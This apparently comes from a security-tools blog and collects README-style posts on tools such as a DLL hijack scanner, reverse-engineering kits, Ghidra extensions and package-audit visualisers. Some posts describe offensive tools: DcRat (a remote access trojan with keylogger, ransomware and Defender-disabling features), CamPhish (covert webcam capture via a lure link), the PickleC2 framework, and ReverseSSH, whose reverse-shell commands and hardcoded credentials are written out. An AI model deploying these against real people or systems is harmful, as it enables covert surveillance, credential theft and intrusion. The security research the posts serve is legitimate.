
DLLHSC - DLL Hijack SCanner A Tool To Assist With The Discovery Of Suitable Candidates For DLL Hijacking

15 March 2021 at 11:30
By: Zion3R


DLL Hijack SCanner - A tool to generate leads and automate the discovery of candidates for DLL Search Order Hijacking


Contents of this repository

This repository hosts the Visual Studio project file for the tool (DLLHSC), the project file for the API hooking functionality (detour), the project file for the payload and last but not least the compiled executables for x86 and x64 architecture (in the release section of this repo). The code was written and compiled with Visual Studio Community 2019.

If you choose to compile the tool from source, you will need to compile the projects DLLHSC, detour and payload. DLLHSC implements the core functionality of this tool. The detour project generates a DLL that is used to hook APIs. And the payload project generates the DLL that is used as a proof of concept to check if the tested executable can load it via search order hijacking. The generated payload has to be placed in the same directory as DLLHSC and detour, named payload32.dll for x86 or payload64.dll for x64 architecture.


Modes of operation

The tool implements three modes of operation, which are explained below.


Lightweight Mode

Loads the executable image in memory, parses the Import table and then replaces any DLL referenced in the Import table with a payload DLL.

The tool places in the application directory only a module (DLL) that is not already present in the application directory, does not belong to WinSxS and does not belong to the KnownDLLs.

The payload DLL, upon execution, creates a file in the following path: C:\Users\%USERNAME%\AppData\Local\Temp\DLLHSC.tmp as proof of execution. The tool launches the application and reports whether the payload DLL was executed by checking if the temporary file exists. As some executables import functions from the DLLs they load, error message boxes may show up when the provided DLL fails to export these functions and thus meet the dependencies of the provided image. However, the message boxes indicate the DLL may be a good candidate for payload execution if the dependencies are met. In this case, additional analysis is required. The title of these message boxes may contain the strings: Ordinal Not Found or Entry Point Not Found. DLLHSC looks for windows that contain these strings, closes them as soon as they show up and reports the results.
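
For a quick manual check of the proof of execution, you can look for the temporary file yourself from a command prompt (a minimal sketch; the path is the one stated above, with %LOCALAPPDATA% expanding to C:\Users\%USERNAME%\AppData\Local):

dir "%LOCALAPPDATA%\Temp\DLLHSC.tmp"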


List Modules Mode

Creates a process with the provided executable image, enumerates the modules that are loaded in the address space of this process and reports the results after applying filters.

The tool reports only the modules that are loaded from the System directory and do not belong to the KnownDLLs. The results are leads that require additional analysis. The analyst can then place the reported modules in the application directory and check if the application loads the provided module instead.


Run-Time Mode

Hooks the LoadLibrary and LoadLibraryEx APIs via Microsoft Detours and reports the modules that are loaded in run-time.

Each time the scanned application calls LoadLibrary or LoadLibraryEx, the tool intercepts the call and writes the requested module to the file C:\Users\%USERNAME%\AppData\Local\Temp\DLLHSCRTLOG.tmp. If LoadLibraryEx is specifically called with the flag LOAD_LIBRARY_SEARCH_SYSTEM32, no output is written to the file. After all interceptions have finished, the tool reads the file and prints the results. Of interest for further analysis are modules that do not exist in the KnownDLLs registry key, modules that do not exist in the System directory and modules with no full path (for these modules the loader applies the normal search order).


Compile and Run Guidance

Should you choose to compile the tool from source, it is recommended to do so in Visual Studio 2019. For the tool to function properly, the projects DLLHSC, detour and payload have to be compiled for the same architecture and then placed in the same directory. Please note that the DLL generated from the project payload has to be renamed to payload32.dll for 32-bit architecture or payload64.dll for 64-bit architecture.


Help menu

The help menu for this application:

NAME
dllhsc - DLL Hijack SCanner

SYNOPSIS
dllhsc.exe -h

dllhsc.exe -e <executable image path> (-l|-lm|-rt) [-t seconds]

DESCRIPTION
DLLHSC scans a given executable image for DLL Hijacking and reports the results

It requires elevated privileges

OPTIONS
-h, --help
display this help menu and exit

-e, --executable-image
executable image to scan

-l, --lightweight
parse the import table, attempt to launch a payload and report the results

-lm, --list-modules
list loaded modules that do not exist in the application's directory

-rt, --runtime-load
display modules loaded in run-time by hooking LoadLibrary and LoadLibraryEx APIs

-t, --timeout
number of seconds to wait for checking any popup error windows - defaults to 10 seconds


Example Runs

This section provides examples of how you can run DLLHSC and the results it reports. For this purpose, the legitimate Microsoft utility OleView.exe (MD5: D1E6767900C85535F300E08D76AAC9AB) was used. For better results, it is recommended that the provided executable image is scanned within its installation directory.

The flag -l parses the import table of the provided executable, applies filters and attempts to weaponize the imported modules by placing a payload DLL in the application's current directory. The scanned executable may pop an error message box when dependencies for the payload DLL (exported functions) are not met. DLLHSC checks for 10 seconds by default, or for as many seconds as the user specifies with the flag -t, whether a message box was opened. An error message box indicates that, if its dependencies are met, the module can be weaponized.
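
Based on the synopsis shown in the help menu above, a lightweight-mode run might look as follows (the OleView.exe path is hypothetical; point it at the actual installation directory):

dllhsc.exe -e "C:\Program Files\OleView\OleView.exe" -l -t 15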

The following screenshot shows the error message box generated when OleView.exe loads the payload DLL:



The tool waits for a maximum timeframe of 10 seconds (or -t seconds) to make sure process initialization has finished and any message box has been generated. It then detects the message box, closes it and reports the result:



The flag -lm launches the provided executable and prints the modules it loads that neither belong to the KnownDLLs list nor are WinSxS dependencies. This mode aims to give an idea of the DLLs that may be used as a payload, and exists only to generate leads for the analyst.
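
A list-modules run follows the same pattern (again, the path is hypothetical):

dllhsc.exe -e "C:\Program Files\OleView\OleView.exe" -lm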



The flag -rt prints the modules the provided executable image loads in its address space when launched as a process. This is achieved by hooking the LoadLibrary and LoadLibraryEx APIs via Microsoft Detours.
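
And a run-time mode run, per the synopsis above (hypothetical path):

dllhsc.exe -e "C:\Program Files\OleView\OleView.exe" -rt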



Feedback

For any feedback on this tool, please use the GitHub Issues section.



Retoolkit - Reverse Engineer's Toolkit

26 March 2021 at 11:30
By: Zion3R


This is a collection of tools you may like if you are interested in reverse engineering and/or malware analysis on x86 and x64 Windows systems. After installing this toolkit you'll have a folder on your desktop with shortcuts to RE tools like these:


Why do I need it?

You don't. Obviously, you can download such tools from their own website and install them by yourself in a new VM. But if you download retoolkit, it can probably save you some time. Additionally, the tools come pre-configured so you'll find things like x64dbg with a few plugins, command-line tools working from any directory, etc. You may like it if you're setting up a new analysis VM.


Download

The *.iss files you see here are the source code for our setup program built with Inno Setup. To download the real thing, you have to go to the Releases section and download the setup program.


Included tools

Check the wiki.



Is it safe to install it in my environment?

I don't know. Some included tools are not open source and come from shady places. You should use it exclusively in virtual machines and under your own responsibility.


Can you add tool X?

It depends. The idea is to keep it simple. We won't add a tool just because it's not here yet. But if you think there's a good reason to do so, and the license allows us to redistribute the software, please file a request here.



Php_Code_Analysis - Scan your PHP code for vulnerabilities


This script will scan your code.

The script can find:

  1. check_file_upload issues
  2. host_header_injection
  3. SQL injection
  4. insecure deserialization
  5. open_redirect
  6. SSRF
  7. XSS
  8. LFI
  9. command_injection

features
  1. fast
  2. simple report

usage:
python code.py <file name>   >>> scans one file
python code.py               >>> scans the full current folder (.)
python code.py <path>        >>> scans the given folder

Kaiju - A Binary Analysis Framework Extension For The Ghidra Software Reverse Engineering Suite


CERT Kaiju is a collection of binary analysis tools for Ghidra.

This is a Ghidra/Java implementation of some features of the CERT Pharos Binary Analysis Framework, particularly the function hashing and malware analysis tools, but is expected to grow new tools and capabilities over time.

As this is a new effort, this implementation does not yet have full feature parity with the original C++ implementation based on ROSE; however, the move to Java and Ghidra has actually enabled some new features not available in the original framework -- notably, improved handling of non-x86 architectures. Since some significant re-architecting of the framework and tools is taking place, and the move to Java and Ghidra enables different capabilities than the C++ implementation, the decision was made to utilize new branding such that there would be less confusion between implementations when discussing the different tools and capabilities.

Our intention for the near future is to maintain both the original Pharos framework as well as Kaiju, side-by-side, since both can provide unique features and capabilities.

CAVEAT: As a prototype, there are many issues that may come up when evaluating the function hashes created by this plugin. For example, unlike the Pharos implementation, Kaiju's function hashing module will create hashes for very small functions (e.g., ones with a single instruction like RET), causing many more unintended collisions. As such, analytical results may vary between this plugin and Pharos fn2hash.


Quick Installation

Pre-built Kaiju packages are available. Simply download the ZIP file corresponding with your version of Ghidra and install according to the instructions below. It is recommended to install via Ghidra's graphical interface, but it is also possible to manually unzip into the appropriate directory to install.

CERT Kaiju requires the following runtime dependencies:

NOTE: It is also possible to build the extension package on your own and install it. Please see the instructions under the "Build Kaiju Yourself" section below.


Graphical Installation

Start Ghidra, and from the opening window, select from the menu: File > Install Extension. Click the plus sign at the top of the extensions window, navigate and select the .zip file in the file browser and hit OK. The extension will be installed and a checkbox will be marked next to the name of the extension in the window to let you know it is installed and ready.

The interface will ask you to restart Ghidra to start using the extension. Simply restart, and then Kaiju's extra features will be available for use interactively or in scripts.

Some functionality may require enabling Kaiju plugins. To do this, open the Code Browser then navigate to the menu File > Configure. In the window that pops up, click the Configure link below the "CERT Kaiju" category icon. A pop-up will display all available publicly released Kaiju plugins. Check any plugins you wish to activate, then hit OK. You will now have access to interactive plugin features.

If a plugin is not immediately visible once enabled, you can find the plugin underneath the Window menu in the Code Browser.

Experimental "alpha" versions of future tools may be available from the "Experimental" category if you wish to test them. However these plugins are definitely experimental and unsupported and not recommended for production use. We do welcome early feedback though!


Manual Installation

Ghidra extensions like Kaiju may also be installed manually by unzipping the extension contents into the appropriate directory of your Ghidra installation. For more information, please see The Ghidra Installation Guide.
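
As a rough sketch, a manual install of a built extension ZIP might look like this (assuming the ZIP name produced by the build described below, and the installation-wide Extensions directory; consult the Ghidra Installation Guide for the authoritative procedure):

unzip ghidra_X.Y.Z_PUBLIC_YYYYMMDD_kaiju.zip -d $GHIDRA_INSTALL_DIR/Ghidra/Extensions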


Usage

Kaiju's tools may be used either in an interactive graphical way, or via a "headless" mode more suited for batch jobs. Some tools may only be available for graphical or headless use, by the nature of the tool.


Interactive Graphical Interface

Kaiju creates an interactive graphical interface (GUI) within Ghidra utilizing Java Swing and Ghidra's plugin architecture.

Most of Kaiju's tools are actually Analysis plugins that run automatically when the "Auto Analysis" option is chosen, either upon import of a new executable to disassemble, or by directly choosing Analysis > Auto Analyze... from the code browser window. You will see several CERT Analysis plugins selected by default in the Auto Analyze tool, but you can enable/disable any as desired.

The Analysis tools must be run before the various GUI tools will work, however. In some corner cases, it may even be helpful to run the Auto Analysis twice to ensure all of the metadata is produced to create correct partitioning and disassembly information, which in turn can influence the hashing results.

Analyzers are automatically run during Ghidra's analysis phase and include:

  • DisasmImprovements = improves the function partitioning of the disassembly compared to the standard Ghidra partitioning.
  • Fn2Hash = calculates function hashes for all functions in a program and is used to generate YARA signatures for programs.

The GUI tools include:

  • Function Hash Viewer = a plugin that displays an interactive list of functions in a program and several types of hashes. Analysts can use this to export one or more functions from a program into YARA signatures.
    • Select Window > CERT Function Hash Viewer from the menu to get started with this tool if it is not already visible. A new window will appear displaying a table of hashes and other data. Buttons along the top of the window can refresh the table or export data to file or a YARA signature. This window may also be docked into the main Ghidra CodeBrowser for easier use alongside other plugins. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.
  • OOAnalyzer JSON Importer = a plugin that can load, parse, and apply Pharos-generated OOAnalyzer results to object oriented C++ executables in a Ghidra project. When launched, the plugin will prompt the user for the JSON output file produced by OOAnalyzer that contains information about recovered C++ classes. After loading the JSON file, recovered C++ data types and symbols found by OOAnalyzer are updated in the Ghidra Code Browser. The plugin's design and implementation details are described in our SEI blog post titled Using OOAnalyzer to Reverse Engineer Object Oriented Code with Ghidra.
    • Select CERT > OOAnalyzer Importer from the menu to get started with this tool. A simple dialog popup will ask you to locate the JSON file you wish to import. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.

Command-line "Headless" Mode

Ghidra also supports a "headless" mode allowing tools to be run in some circumstances without use of the interactive GUI. These commands can therefore be utilized for scripting and "batch mode" jobs of large numbers of files.

The headless tools largely rely on Ghidra's GhidraScript functionality.

Headless tools include:

  • fn2hash = automatically run Fn2Hash on a given program and export all the hashes to a CSV file specified
  • fn2yara = automatically run Fn2Hash on a given program and export all hash data as YARA signatures to the file specified
  • fnxrefs = analyze a Program and export a list of Functions based on entry point address that have cross-references in data or other parts of the Program

A simple shell launch script named kaijuRun has been included to run these headless commands for simple scenarios, such as outputting the function hashes for every function in a single executable. Assuming the GHIDRA_INSTALL_DIR variable is set, one might for example run the launch script on a single executable as follows:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun fn2hash example.exe

This command would output the results to an automatically named file, example.exe.Hashes.csv.
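
The fn2yara tool can be launched the same way to export YARA signatures instead (a sketch following the same pattern; the exact output file naming may differ):

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun fn2yara example.exe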

Basic help for the kaijuRun script is available by running:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun --help

Please see docs/HeadlessKaiju.md file in the repository for more information on using this mode and the kaijuRun launcher script.


Further Documentation and Help

More comprehensive documentation and help is available, in one of two formats.

See the docs/ directory for Markdown-formatted documentation and help for all Kaiju tools and components. These documents are easy to maintain and edit and read even from a command line.

Alternatively, you may find the same documentation in Ghidra's built-in help system. To access these help docs, from the Ghidra menu, go to Help > Contents and then select CERT Kaiju from the tree navigation on the left-hand side of the help window.

Please note that the Ghidra Help documentation is the exact same content as the Markdown files in the docs/ directory; thanks to an in-tree gradle plugin, gradle will automatically parse the Markdown and export into Ghidra HTML during the build process. This allows even simpler maintenance (update docs in just one place, not two) and keeps the two in sync.

All new documentation should be added to the docs/ directory.


Building Kaiju Yourself Using Gradle

As an alternative to the pre-built packages, you may compile and build Kaiju yourself.


Build Dependencies

CERT Kaiju requires the following build dependencies:

  • Ghidra 9.1+ (9.2+ recommended)
  • gradle 6.4+ (latest gradle 6.x recommended, 7.x not supported)
  • GSON 2.8.6
  • Java 11+ (we recommend OpenJDK 11)

NOTE ABOUT GRADLE: Please ensure that gradle is building against the same JDK version in use by Ghidra on your system, or you may experience installation problems.

NOTE ABOUT GSON: In most cases, Gradle will automatically obtain this for you. If you find that you need to obtain it manually, you can download gson-2.8.6.jar and place it in the kaiju/lib directory.


Build Instructions

Once dependencies are installed, Kaiju may be built as a Ghidra extension by using the gradle build tool. It is recommended to first set a Ghidra environment variable, as Ghidra installation instructions specify.

In short: set GHIDRA_INSTALL_DIR as an environment variable first, then run gradle without any options:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle

NOTE: Your Ghidra install directory is the directory containing the ghidraRun script (the top level directory after unzipping the Ghidra release distribution into the location of your choice.)

If for some reason your environment variable is not or cannot be set, you can also specify it on the command line with:

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>

In either case, the newly-built Kaiju extension will appear as a .zip file within the dist/ directory. The filename will include "Kaiju", the version of Ghidra it was built against, and the date it was built. If all goes well, you should see a message like the following that tells you the name of your built plugin.

Created ghidra_X.Y.Z_PUBLIC_YYYYMMDD_kaiju.zip in <path/to>/kaiju/dist

where X.Y.Z is the version of Ghidra you are using, and YYYYMMDD is the date you built this Kaiju extension.


Optional: Running Tests With AUTOCATS

While not required, you may want to use the Kaiju testing suite to verify proper compilation and ensure there are no regressions while testing new code or before you install Kaiju in a production environment.

In order to run the Kaiju testing suite, you will need to first obtain the AUTOCATS (AUTOmated Code Analysis Testing Suite). AUTOCATS contains a number of executables and related data to perform tests and check for regressions in Kaiju. These test cases are shared with the Pharos binary analysis framework, therefore AUTOCATS is located in a separate git repository.

Clone the AUTOCATS repository with:

git clone https://github.com/cmu-sei/autocats

We recommend cloning the AUTOCATS repository into the same parent directory that holds Kaiju, but you may clone it anywhere you wish.

The tests can then be run with:

gradle -PKAIJU_AUTOCATS_DIR=path/to/autocats/dir test

where of course the correct path is provided to your cloned AUTOCATS repository directory. If cloned to the same parent directory as Kaiju as recommended, the command would look like:

gradle -PKAIJU_AUTOCATS_DIR=../autocats test

The tests cannot be run without providing this path; if you do forget it, gradle will abort and give an error message about providing this path.

Kaiju has a dependency on JUnit 5 only for running tests. Gradle should automatically retrieve and use JUnit, but you may also download JUnit and manually place into lib/ directory of Kaiju if needed.

You will want to update (git pull) the AUTOCATS repository whenever you pull the latest Kaiju source code, to ensure the two stay in sync.


First-Time "Headless" Gradle-based Installation

If you compiled and built your own Kaiju extension, you may alternately install the extension directly on the command line via use of gradle. Be sure to set GHIDRA_INSTALL_DIR as an environment variable first (if you built Kaiju too, then you should already have this defined), then run gradle as follows:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle install

or if you are unsure if the environment variable is set,

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir> install

Extension files should be copied automatically. Kaiju will be available for use after Ghidra is restarted.

NOTE: Be sure that Ghidra is NOT running before using gradle to install. We are aware of instances when the caching does not appear to update properly if installed while Ghidra is running, leading to some odd bugs. If this happens to you, simply exit Ghidra and try reinstalling again.


Consider Removing Your Old Installation First

It might be helpful to first completely remove any older install of Kaiju before updating to a newer release. We've seen some cases where older versions of Kaiju files get stuck in the cache and cause interesting bugs due to the conflicts. By removing the old install first, you'll ensure a clean re-install and easy use.

The gradle build process can now auto-remove previous installs of Kaiju if you enable this feature. To enable the autoremove, add the "KAIJU_AUTO_REMOVE" property to your install command, such as (assuming the environment variable is set as in the previous section):

gradle -PKAIJU_AUTO_REMOVE install

If you'd prefer to remove your old installation manually, perform a command like:

rm -rf $GHIDRA_INSTALL_DIR/Extensions/Ghidra/*kaiju*.zip $GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju


DcRat - A Simple Remote Tool Written In C#

12 July 2021 at 21:30
By: Zion3R


DcRat is a simple remote tool written in C#


Introduction

Features
  • TCP connection with certificate verification, stable and secure
  • Server IP and port can be retrieved through a link
  • Multi-server, multi-port support
  • Plugin system through DLLs, with strong extensibility
  • Super tiny client size (about 40~50K)
  • Data transfer with msgpack (better than JSON and other formats)
  • Logging system recording all events

Functions
  • Remote shell
  • Remote desktop
  • Remote camera
  • Registry Editor
  • File management
  • Process management
  • Netstat
  • Remote recording
  • Process notification
  • Send file
  • Inject file
  • Download and Execute
  • Send notification
  • Chat
  • Open website
  • Modify wallpaper
  • Keylogger
  • File lookup
  • DDOS
  • Ransomware
  • Disable Windows Defender
  • Disable UAC
  • Password recovery
  • Open CD
  • Lock screen
  • Client shutdown/restart/upgrade/uninstall
  • System shutdown/restart/logout
  • Bypass UAC
  • Get computer information
  • Thumbnails
  • Auto task
  • Mutex
  • Process protection
  • Block client
  • Install with schtasks
  • etc

Deployment
  • Build: Visual Studio 2019
  • Runtime:
    • Server: .NET Framework 4.61
    • Client and others: .NET Framework 4.0

Support
  • The following systems (32 and 64 bit) are supported
    • Windows XP SP3
    • Windows Server 2003
    • Windows Vista
    • Windows Server 2008
    • Windows 7
    • Windows Server 2012
    • Windows 8/8.1
    • Windows 10

TODO
  • Password recovery and other stealers (only Chrome and Edge are supported now)
  • Reverse Proxy
  • Hidden VNC
  • Hidden RDP
  • Hidden Browser
  • Client Map
  • Real time Microphone
  • Some fun function
  • Information Collection(Maybe with UI)
  • Support unicode in Remote Shell
  • Support Folder Download
  • Support more ways to install Clients
  • ...

Compile

Open the project in Visual Studio 2019 and press CTRL+SHIFT+B.


Download

Press here to download the latest release.


Attention

I (qwqdanchun) am not responsible for any actions and/or damages caused by your use or dissemination of the software. You are fully responsible for any use of the software and acknowledge that the software is only used for educational and research purposes. If you download the software or the source code of the software, you will automatically agree with the above content.


Thanks


CamPhish - Grab Cam Shots From Target's Phone Front Camera Or PC Webcam Just By Sending A Link

16 August 2021 at 12:30
By: Zion3R

Grab cam shots from a target's phone front camera or PC webcam just by sending a link.


What is CamPhish?

CamPhish uses techniques to take cam shots of a target's phone front camera or PC webcam. CamPhish hosts a fake website on a built-in PHP server and uses ngrok & serveo to generate a link, which we then forward to the target and which can be used over the internet. The website asks for camera permission and, if the target allows it, this tool grabs cam shots from the target's device.


Features

This tool includes two automatic webpage templates for keeping the target engaged on the webpage, in order to get more pictures from the cam:

  • Festival Wishing
  • Live YouTube TV

Simply enter a festival name or a YouTube video ID.


This tool has been tested on:
  • Kali Linux
  • Termux
  • MacOS
  • Ubuntu
  • Parrot Sec OS

Installing and requirements

This tool requires PHP for the web server and SSH or serveo for the link. First run the following command in your terminal:

apt-get -y install php openssh git wget

Installing (Kali Linux/Termux):
git clone https://github.com/techchipnet/CamPhish
cd CamPhish
bash camphish.sh

CamPhish was created to help in penetration testing; its authors are not responsible for any misuse or illegal purposes.

CamPhish is inspired by https://github.com/thelinuxchoice/ Big thanks to @thelinuxchoice



PickleC2 - A Post-Exploitation And Lateral Movements Framework

16 August 2021 at 21:30
By: Zion3R

PickleC2 is a post-exploitation and lateral movements framework.


Documentation

ReadTheDocs


Overview

PickleC2 is a simple C2 framework written in python3, used to help the community of penetration testers in their red teaming engagements.

PickleC2 has the ability to import your own PowerShell module for Post-Exploitation and Lateral Movement or automate the process.


Features

There is one implant in the beta version, which is PowerShell.

  1. PickleC2 uses fully encrypted communications, protecting the confidentiality and integrity of the C2 traffic even when communicating over HTTP.

  2. PickleC2 can handle multiple listeners and implants with no issues.

  3. PickleC2 supports anyone who would like to add their own PowerShell module.


Future Features

In upcoming updates, PickleC2 will support:

  1. A Go implant.

  2. A PowerShell-less implant that doesn't use System.Management.Automation.dll.

  3. Malleable C2 profiles.

  4. HTTPS communications. NOTE: even plain HTTP communications are fully encrypted.


Install
git clone https://github.com/xRET2pwn/PickleC2.git
cd PickleC2
sudo apt install python3 python3-pip
python3 -m pip install -r requirements.txt
./run.py


ReverseSSH - Statically-linked Ssh Server With Reverse Shell Functionality For CTFs And Such

17 August 2021 at 12:30
By: Zion3R


A statically-linked ssh server with a reverse connection feature for simple yet powerful remote access. Most useful during HackTheBox challenges, CTFs or similar.

Has been developed and was extensively used during OSCP exam preparation.

Get the latest Release


Features

Catching a reverse shell with netcat is cool, sure, but who hasn't accidentally closed a reverse shell with a keyboard interrupt due to muscle memory? Besides their fragility, such shells are also often missing convenience features such as fully interactive access, TAB-completion or history.

Instead, you can simply deploy the lightweight ssh server (<1.5MB) reverse-ssh onto the target, and use additional conveniences such as file transfer and port forwarding!

ReverseSSH tries to bridge the gap between initial foothold on a target and full local privilege escalation. Its main strengths are the following:

  • Fully interactive shell access (check windows caveats below)
  • File transfer via sftp
  • Local / remote / dynamic port forwarding
  • Can be used as bind- and reverse-shell
  • Supports Unix and Windows operating systems

Windows caveats

A fully interactive powershell on windows relies on Windows Pseudo Console ConPTY and thus requires at least Win10 Build 17763. On earlier versions you can still get an interactive reverse shell that can't handle virtual terminal codes such as arrow keys or keyboard interrupts. In such cases you have to append the cmd command, i.e. ssh <OPTIONS> <IP> cmd.

You can achieve full interactive shell access for older windows versions by dropping ssh-shellhost.exe from OpenSSH for Windows in the same directory as reverse-ssh and then using the flag -s ssh-shellhost.exe. This will pipe all traffic through ssh-shellhost.exe, which mimics a pty and translates all virtual terminal codes into a form that windows can understand.
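
Putting this together, a bind-shell session against a pre-Windows 10 target might look like this (a sketch assuming both binaries sit in the same directory, as described above, and the default listening port):

# On the victim (pre-Win10)
reverse-ssh.exe -s ssh-shellhost.exe

# On the attacker (default password: letmeinbrudipls)
ssh -p 31337 <RHOST>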


Requirements

Simply executing the provided binaries only relies on golang system requirements.

In short:

  • Linux: kernel version 2.6.23 and higher
  • Windows: Windows Server 2008R2 and higher or Windows 7 and higher

Compiling additionally requires the following:

  • golang version 1.15
  • optionally upx for compression (e.g. apt install upx-ucl)

Usage

Once reverse-ssh is running, you can connect with any username and the default password letmeinbrudipls, the ssh key or whatever you specified during compilation. After all, it is just an ssh server:

# Fully interactive shell access
ssh -p <RPORT> <RHOST>

# Simple command execution
ssh -p <RPORT> <RHOST> whoami

# Full-fledged file transfers
sftp -P <RPORT> <RHOST>

# Dynamic port forwarding as SOCKS proxy on port 9050
ssh -p <RPORT> -D 9050 <RHOST>

Simple bind shell scenario
# Victim
victim$./reverse-ssh

# Attacker (default password: letmeinbrudipls)
attacker$ssh -p 31337 <LHOST>

Simple reverse shell scenario
# On attacker (get ready to catch the incoming request;
# can be omitted if you already have an ssh daemon running, e.g. OpenSSH)
attacker$./reverse-ssh -l :<LPORT>

# On victim
victim$./reverse-ssh -p <LPORT> <LHOST>
# or in case of an ssh daemon listening at port 22 with user/pass authentication
victim$./reverse-ssh <USER>@<LHOST>

# On attacker (default password: letmeinbrudipls)
attacker$ssh -p 8888 127.0.0.1
# or with ssh config from below
attacker$ssh target

In the end it's plain ssh, so you could catch the remote port forwarding call coming from the victim's machine with your openssh daemon listening on port 22. Just prepend <USER>@ and provide the password once asked to do so. Dialling home currently is password only, because I didn't feel like baking a private key in there as well yet...

For even more convenience, add the following to your ~/.ssh/config, copy the ssh private key to ~/.ssh/ and simply call ssh target or sftp target afterwards:

Host target
    Hostname 127.0.0.1
    Port 8888
    IdentityFile ~/.ssh/id_reverse-ssh
    IdentitiesOnly yes
    StrictHostKeyChecking no
    UserKnownHostsFile /dev/null

Full usage
reverseSSH v1.1.0  Copyright (C) 2021  Ferdinor <[email protected]>

Usage: reverse-ssh [options] [<user>@]<target>

Examples:
Bind:
reverse-ssh
reverse-ssh -v -l :4444
Reverse:
reverse-ssh 192.168.0.1
reverse-ssh [email protected]
reverse-ssh -p 31337 192.168.0.1
reverse-ssh -v -b 0 [email protected]

Options:
-s, Shell to use for incoming connections, e.g. /bin/bash; (default: /bin/bash)
for windows this can only be used to give a path to 'ssh-shellhost.exe' to
enhance pre-Windows10 shells (e.g. '-s ssh-shellhost.exe' if in same directory)
-l, Bind scenario only: listen at this address:port (default: :31337)
-p, Reverse scenario only: ssh port at home (default: 22)
-b, Reverse scenario only: bind to this port after dialling home (default: 8888)
-v, Emit log output

<target>
Optional target which enables the reverse scenario. Can be prepended with
<user>@ to authenticate as a different user than 'reverse' while dialling home.

Credentials:
Accepting all incoming connections from any user with either of the following:
* Password "letmeinbrudipls"
* PubKey "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlbJwr+ueQ0gojy4QWr2sUWcNC/Y9eV9RdY3PLO7Bk/ Brudi"

Build instructions

Make sure to install the above requirements such as golang in a matching version and set it up correctly. Afterwards, you can compile with make, which will create static binaries in bin. Use make compressed to pack the binaries with upx to further reduce their size.

make

# or to additionally created binaries packed with upx
make compressed

You can also specify a different default shell (RS_SHELL), a personalized password (RS_PASS) or an authorized key (RS_PUB) when compiling:

ssh-keygen -t ed25519 -f id_reverse-ssh

RS_SHELL="/bin/sh" RS_PASS="secret" RS_PUB="$(cat id_reverse-ssh.pub)" make compressed

Building for different operating systems or architectures

By default, reverse-ssh is compiled for your current OS and architecture, as well as for linux and windows in x86 and x64. To compile for other architectures or another OS you can provide environment variables that match your target, e.g. for linux/arm64:

GOARCH=arm64 GOOS=linux make compressed

A list of available targets in format OS/arch can be obtained via go tool dist list.


Contribute

Is a mind-blowing feature missing? Anything not working as intended?

Create an issue or pull request!



SGXRay - Automating Vulnerability Detection for SGX Apps

17 August 2021 at 21:30
By: Zion3R


Intel SGX protects isolated application logic and sensitive data inside an enclave with hardware-based memory encryption. Using such a hardware-based security mechanism requires a strict programming model for memory usage, with complex APIs in and out of the enclave boundary. Enclave developers are required to apply careful programming practices to ensure enclave security, especially when dealing with data flowing across the enclave's trusted boundary. Trusted boundary violations can further cause memory corruption and are exploitable by attackers to retrieve and manipulate protected data. Currently, no publicly available tools can effectively detect such issues for real-world enclaves.


SGXRay is an automated reasoning tool based on the SMACK verifier that automatically detects SGX enclave bugs rooted in violations of trusted boundaries. It recompiles a given enclave code and starts the analysis from a user-specified enclave function entry. After the analysis, it either finds invalid pointer handling inside the SGX software stack, such as dereferencing an unchecked pointer inside an enclave, invalid memory deallocation, or TOCTOU bugs, or proves the absence of such bugs up to a user-specified loop and recursion bound.

Currently, SGXRay supports SGX applications built on two SGX SDKs: the Intel SGX SDK and the openenclave SDK. Users can opt in SDK code for a more thorough analysis.


Getting Started

For a quick start, please follow a step-by-step tutorial on using SGXRay over one of the demo examples here.

The following figure demonstrates the workflow of SGXRay.

Running SGXRay is a two-step process. The first step is to obtain an LLVM IR file for the application. The second step is to invoke SGXRay CLI for verification.

For the first step, we provide two Docker images, one for each SDK:

docker pull baiduxlab/sgx-ray-frontend-intel
docker pull baiduxlab/sgx-ray-frontend-oe

The detailed instructions to run the first step can be found here.

For the second step, we also provide a Docker image.

docker pull baiduxlab/sgx-ray-distro:latest

The detailed instructions to run the second step can be found here.
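
To explore the verification image interactively, a standard docker run invocation works (a sketch; see the linked instructions for the exact verification workflow):

docker run --rm -it baiduxlab/sgx-ray-distro:latest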


Docker Build

We provide a Dockerfile that builds the image for the verification step.

git clone https://github.com/baiduxlab/sgxray.git && cd sgxray
docker build . -t sgx-ray-distro-local --build-arg hostuid=$UID -f Dockerfiles/Dockerfile-CLI

A successful build should produce an image named sgx-ray-distro-local, which has a user named user with the same user id as the host account.


Documentation

Detailed documentation for SGXRay can be found as follows.



AuraBorealisApp - Do You Know What's In Your Python Packages? A Tool For Visualizing Python Package Registry Security Audit Data

18 August 2021 at 12:30
By: Zion3R


AuraBorealis is a web application for visualizing anomalous and potentially malicious code in Python package registries. It uses security audit data produced by scanning the Python Package Index (PyPI) via Aura, a static analysis tool designed for large-scale security auditing of Python packages. The current tool is a proof-of-concept, and includes some live Aura data, as well as some mockup data for demo purposes.

Current features include:

  • Scanning the entire python package registry to:

    • List packages with the highest number of security warnings, sorted by Aura warning type
    • List packages sorted by the total and unique count of warnings
    • List packages by their overall severity score
  • Displaying security warnings for an individual package, sorted by criticality

  • Visualize the line numbers and lines of code in files generating security warnings for a specific package

  • Compare two packages for security warnings


Instructions

Turn on your VPN (at IQT)

Clone the repository.

git clone https://github.com/IQTLabs/AuraBorealisApp.git

Navigate to aura-borealis-flask-app directory.

cd aura-borealis-flask-app

Install dependencies.

pip install -r requirements.txt

Run the app.

python app.py

Navigate to the URL http://0.0.0.0:7000/ via a browser.


Feature Roadmap
  • Compare a package to a benchmark profile of packages of similar purpose for security warnings
  • Compare different versions of the same package for security warnings
  • List packages that have changes in their warnings and/or severity score between two dates
  • Ability to scan an internal package/registry that's not public on PyPI
  • Display an analysis of permissions (does this package make a network connection? Does this package require OS-level library permissions?)

Contact Information

[email protected] (John Speed Meyers, IQT Labs, Secure Code Reuse project lead).

The lead developer and creator of Aura is Martin Carnogusky of sourcecode.ai.


Related Work


